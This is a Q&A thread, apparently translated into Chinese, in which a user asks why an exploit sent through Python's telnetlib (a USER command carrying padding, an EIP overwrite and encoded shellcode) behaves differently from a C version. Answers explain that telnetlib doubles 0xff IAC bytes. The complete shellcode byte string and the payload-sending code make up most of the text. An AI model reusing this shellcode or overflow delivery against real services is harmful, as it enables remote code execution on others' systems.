
Python 版本是 2.7.3。

代码是这样的……完整的代码在这里

https://gist.github.com/3977494

# Payload bytes copied from the original post (Python 2.7.3 per the question).
# On Python 2 a "\xNN" escape inside a str literal is one raw byte, and
# bytearray() stores those bytes unchanged, so wrapping the literal is not
# what alters the data.
# NOTE: the literal contains several 0xff bytes. 0xff is the telnet IAC
# character, and Telnet.write() doubles every IAC before sending (see the
# telnetlib documentation quoted in the first answer below), so the buffer
# that leaves telnetlib is longer than this one -- that is the difference
# observed in the debugger against the C version.
shellcode = bytearray(
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
        "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
        "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
        "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
        "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
        "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
        "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
        "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
        "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
        "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
        "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
        "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
        "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
        "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
        "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
        "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
        "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
        "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
        "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
        "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
        "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
        "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
        "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
        "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
        "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
        "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
        "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a"
        )

# Excerpt only: the `telnetlib` import and the `fill`, `eip_address` and
# `fill2` values are defined in the linked gist, not shown here.
tn = telnetlib.Telnet('127.0.0.1', 11000) 
# str + bytearray yields a bytearray on Python 2, so user_string is a
# bytearray holding the payload bytes unchanged at this point.
user_string = "USER " + fill + eip_address + fill2 + shellcode + '\n' 
# NOTE: Telnet.write() is documented to double every IAC (0xff) byte before
# it reaches the socket, so what is sent here differs from user_string
# wherever it contains 0xff. This is the telnet-protocol escaping the first
# answer describes, not an encoding change by Python.
tn.write(user_string) 
pass_string = "PASS 123\n" 
tn.write(pass_string)

我的朋友在 C 中使用相同的字符串,一切正常。当我用 OllyDbg 检查时,发现命令不同,似乎 Python 改变了编码方式。我不知道……有什么办法吗?这快把我逼疯了。

/* Same byte sequence as the Python version. The answer below attributes the
 * difference seen in the debugger to how the bytes are sent: this C program
 * reportedly writes to a raw socket, where 0xff is sent as-is, whereas
 * Python's telnetlib doubles 0xff (telnet IAC) on write. The literal itself
 * contains several 0xff bytes, which is where the two dumps diverge. */
unsigned char shellcode[] = 
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x6b"
        "\x58\x53\x74\x77\x70\x67\x70\x73\x30\x6e\x6b\x61\x55\x57\x4c\x4e"
        "\x6b\x51\x6c\x45\x55\x32\x58\x66\x61\x58\x6f\x6e\x6b\x50\x4f\x56"
        "\x78\x4e\x6b\x41\x4f\x65\x70\x33\x31\x4a\x4b\x63\x79\x6e\x6b\x65"
        "\x64\x4c\x4b\x57\x71\x7a\x4e\x37\x41\x4b\x70\x4e\x79\x6c\x6c\x4f"
        "\x74\x4f\x30\x70\x74\x37\x77\x6f\x31\x79\x5a\x46\x6d\x67\x71\x4b"
        "\x72\x5a\x4b\x38\x74\x65\x6b\x41\x44\x47\x54\x43\x34\x52\x55\x68"
        "\x65\x4e\x6b\x33\x6f\x34\x64\x37\x71\x4a\x4b\x72\x46\x6c\x4b\x64"
        "\x4c\x50\x4b\x6c\x4b\x51\x4f\x35\x4c\x63\x31\x68\x6b\x4c\x4b\x35"
        "\x4c\x4c\x4b\x45\x51\x7a\x4b\x6c\x49\x73\x6c\x56\x44\x65\x54\x5a"
        "\x63\x50\x31\x69\x50\x61\x74\x6c\x4b\x67\x30\x64\x70\x6b\x35\x4f"
        "\x30\x72\x58\x34\x4c\x4c\x4b\x71\x50\x44\x4c\x4c\x4b\x72\x50\x55"
        "\x4c\x4c\x6d\x4e\x6b\x73\x58\x53\x38\x68\x6b\x36\x69\x4e\x6b\x6b"
        "\x30\x78\x30\x55\x50\x75\x50\x55\x50\x6c\x4b\x52\x48\x57\x4c\x41"
        "\x4f\x47\x41\x4a\x56\x71\x70\x76\x36\x6d\x59\x69\x68\x4d\x53\x6b"
        "\x70\x33\x4b\x52\x70\x30\x68\x68\x70\x6d\x5a\x74\x44\x33\x6f\x70"
        "\x68\x6d\x48\x6b\x4e\x6f\x7a\x64\x4e\x41\x47\x4b\x4f\x4b\x57\x42"
        "\x43\x70\x6d\x63\x54\x36\x4e\x71\x75\x61\x68\x30\x65\x65\x70\x64"
        "\x6f\x31\x73\x71\x30\x62\x4e\x42\x45\x52\x54\x61\x30\x53\x45\x71"
        "\x63\x75\x35\x30\x72\x37\x50\x72\x48\x50\x61\x62\x43\x52\x4b\x41"
        "\x30\x75\x38\x43\x51\x45\x33\x70\x6b\x45\x70\x54\x6f\x72\x61\x42"
        "\x64\x61\x54\x71\x30\x46\x46\x55\x76\x41\x30\x30\x6e\x61\x75\x71"
        "\x64\x41\x30\x32\x4c\x52\x4f\x41\x73\x73\x51\x52\x4c\x43\x57\x54"
        "\x32\x52\x4f\x62\x55\x44\x30\x67\x50\x53\x71\x33\x54\x62\x4d\x61"
        "\x79\x42\x4e\x42\x49\x51\x63\x62\x54\x32\x52\x70\x61\x74\x34\x42"
        "\x4f\x61\x62\x31\x63\x31\x30\x61\x78\x33\x51\x31\x73\x50\x6b\x65"
        "\x70\x46\x4f\x63\x71\x61\x54\x61\x54\x63\x30\x6a";


哦,我差不多明白了。00AEFD70 处有这么多 FF,为什么?

我用 C++ 编写了相同的功能代码。一切正常。这是比较。

换句话说,这是怎么回事?





telnetlib 的文档写道(强调是我加的):

将字符串写入套接字,并将其中的每个 IAC 字符加倍。如果连接处于阻塞状态,此调用可能会阻塞。如果连接已关闭,可能会引发 socket.error。

IAC 字符恰好是 ASCII 255,即 '\xff'。

如果你比较你的两个转储:IAC 字符 FF 在 Python 版本中被加倍了,而在 C 版本中没有,因为 C 版本使用的是原始套接字;你在 Python 中也可以用 socket 模块做到同样的事。

于 2012-10-30T00:28:46.967 回答

您对 bytearray 的使用可能改变了 shellcode,请尝试不用 bytearray 函数来定义 shellcode。例如:

# Snippet from this answer; the "..." stand for the remaining bytes of the
# original literal. NOTE(review): on Python 2, bytearray() over a str literal
# copies the bytes unchanged, so dropping it is unlikely to change what is
# sent; the other answer traces the difference to Telnet.write() doubling
# 0xff (IAC) bytes.
shellcode = (
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x6a"
        "\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x7a\x32\x42\x42\x42\x32"
        ...
        ...
)
于 2012-10-29T16:41:22.047 回答